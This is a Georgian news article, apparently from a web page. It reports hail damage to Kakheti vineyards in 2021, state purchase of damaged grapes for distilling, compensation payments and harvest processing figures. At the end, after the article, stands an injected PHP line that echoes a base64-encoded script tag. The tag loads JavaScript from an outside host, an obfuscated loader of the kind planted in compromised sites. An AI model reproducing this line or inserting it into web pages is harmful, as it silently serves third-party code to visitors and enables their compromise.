gorgia
გარე ავეჯი
15 ათას ტონამდე დასეტყვილი ყურძენი სახელმწიფო საწარმო - შპს „მოსავლის მართვის კომპანიამ" ჩაიბარა. დასეტყვილი ყურძნის რეალიზაციით მევენახეების შემოსავალმა 13 მლნ ლარს მიაღწია.
 
როგორც Business Time-ს ღვინის ეროვნული სააგენტოდან აცნობეს, 26 აგვისტოს, ძლიერმა სეტყვამ და ქარმა, კახეთის რეგიონში, კერძოდ  გურჯაანის, თელავისა და ყვარლის მუნიციპალიტეტებში, 4600-ჰა ფართობის ვენახები დააზიანა. „მოსავლის მართვის კომპანიამ“ დასეტყვილი ყურძნის სასპირტედ მიღება-გადამუშავება სტიქიდან მეორე დღესვე, 27 აგვისტოს დაიწყო.
 
2 სექტემბერს სეტყვა კვლავ განმეორდა ყვარელსა და თელავში, სადაც ამჯერად 180 ჰა ფართობის ვენახები დაზიანდა. აღსანიშნავია, რომ მთავრობის გადაწყვეტილებით, მევენახები, რომლებსაც სეტყვამ 100%-ით გაუნადგურა მოსავალი, ერთჯერადი კომპენსაციის სახით, თითოეულ 1 ჰექტარ ფართობზე 3000 ლარს მიიღებენ. მიმდინარეობს სეტყვისგან დაზარალებული აგროდაზღვევის სახელმწიფო პროგრამის ბენეფიციარების ზარალის დათვლა. სეტყვის შედეგად დაზიანებული ყურძენი მევენახეებმა 1 კგ რქაწითელი  0,80 ლარად და 1 კგ საფერავი - 1 ლარად ჩააბარეს. 7 სექტემბრის მონაცემებით, გადამუშავებულია 53 ათას ტონამდე ტონამდე ყურძენი, რაც თითქმის 5-ჯერ აღემატება გასული წლის ანალოგიურ მაჩვენებელს - 2020 წლის 7 სექტემბრის მდგომარეობით კახეთში 10 ათას ტონამდე ყურძენი იყო გადამუშავებული. რთველი 2021-ის ფარგლებში, გადამუშავებულია 30 ათას ტონამდე რქაწითელი, 17 ათას ტონამდე საფერავი, 2 ათას ტონამდე კახური მწვანე და დანარჩენი სხვადასხვა ჯიშის ყურძენია.
1176
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");